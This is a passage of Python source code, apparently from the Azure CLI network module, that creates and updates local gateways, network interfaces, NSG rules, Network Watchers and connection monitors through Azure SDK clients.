resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
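    """Create a network interface with a single IP configuration named 'ipconfig1'.

    The optional NSG, public IP, accelerated networking, application security groups
    and application gateway backend pools are attached only when the current API
    version supports them. Illustrative CLI invocation (values are placeholders):

        az network nic create -g MyGroup -n MyNic --vnet-name MyVnet --subnet MySubnet
    """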
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
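    """Populate either the singular or the plural form of a property on kwargs.

    A single value (or a one-element list) sets singular_name and clears plural_name;
    a multi-element list does the opposite. Sketch of the behaviour:

        kwargs = {}
        _create_singular_or_plural_property(kwargs, '80', 'port', 'ports')
        # kwargs == {'port': '80', 'ports': None}
    """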
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
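    """Create an NSG security rule using the 2017-06-01+ shape, which supports plural
    source/destination address prefixes and port ranges as well as application
    security groups. Illustrative CLI invocation (values are placeholders):

        az network nsg rule create -g MyGroup --nsg-name MyNsg -n MyRule --priority 100 --access Allow --protocol Tcp --destination-port-ranges 80 443
    """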
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
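    """Enable, update or disable Network Watcher across the given regions.

    With enabled=True, watchers named '<location>-watcher' are created in the given
    resource group for regions that do not yet have one and existing watchers are
    re-tagged; with enabled=False, existing watchers are deleted; with enabled left
    unset, only existing watchers are updated. Illustrative CLI invocation:

        az network watcher configure -g MyGroup --locations westus eastus --enabled true
    """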
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
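    """Create a connection monitor, dispatching between the legacy (V1) and the
    endpoint/test-group based (V2) request shapes.

    Supplying any of source_resource/source_port/dest_* selects V1 and switches the
    client to the ad-hoc API version pinned for V1 connection monitors; supplying any
    of the endpoint/test-config/output arguments selects V2. Illustrative V2
    invocation (values are placeholders):

        az network watcher connection-monitor create -n MyMonitor -l westus --endpoint-source-name src --endpoint-source-resource-id <vm-id> --endpoint-dest-name dst --endpoint-dest-address bing.com --test-config-name tcp443 --protocol Tcp --tcp-port 443
    """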
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
        raise CLIError('usage error: either the V1 or the V2 set of connection monitor arguments must be provided')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
        raise CLIError('usage error: '
                       '--filter-type and --filter-item must be provided together for an endpoint filter.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
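    """Build a ConnectionMonitorTestConfiguration for a V2 connection monitor.

    A success threshold is attached when either threshold argument is given, and a
    protocol-specific sub-configuration (TCP, ICMP or HTTP) is populated based on
    protocol; any other protocol raises a CLIError.
    """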
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
